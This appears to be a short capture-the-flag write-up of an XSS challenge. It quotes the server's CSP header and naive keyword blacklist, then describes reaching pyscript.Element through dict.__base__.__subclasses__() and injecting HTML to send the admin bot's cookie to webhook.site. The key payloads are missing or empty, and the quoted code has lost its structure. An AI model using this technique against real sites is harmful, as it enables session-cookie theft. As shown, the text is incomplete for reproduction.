Tags: web python pyscript xss 

Rating: 5.0

The source code for this challenge was provided. There was no apparent XSS vector on the server-side. But there were a couple of related defenses on app.py:
def add_csp(res):
res.headers['Content-Security-Policy'] = "script-src 'self' 'wasm-unsafe-eval'; object-src 'none'; base-uri 'none';"
return res
def code_page(code_id):
if code_id not in projects.keys():

code = projects.get(code_id)

# Genius filter to prevent xss
blacklist = ["script", "img", "onerror", "alert"]
for word in blacklist:
if word in code:
# XSS attempt detected!

res = make_response(render_template("code.html", code=code))
return res
PyScript was being used on the front-end to run python code on the browser that we could provide. I didn't found a way to import modules so I checked the available methods with the following payload:
Which resulted in 367 class methods being printed. Out of those one in particular can be used in our XSS efforts:
number 363 <class 'pyscript.Element'>
Uppon checing the documentation at https://docs.pyscript.net/latest/reference/API/element.html?highlight=element and https://docs.pyscript.net/latest/tutorials/writing-to-page.html I forged the final payload to get the admin's cookie:
but = dict.__base__.__subclasses__()[363]("buttons")
but.element.innerHTML= ''
Sent the link to this code to the admin's bot and got the flag on the webhook.site:
Check the video above for a more comprehensive overview of the exercise and feel free to ask questions in the comments.

Original writeup (https://youtu.be/P_0wrB-EAeU).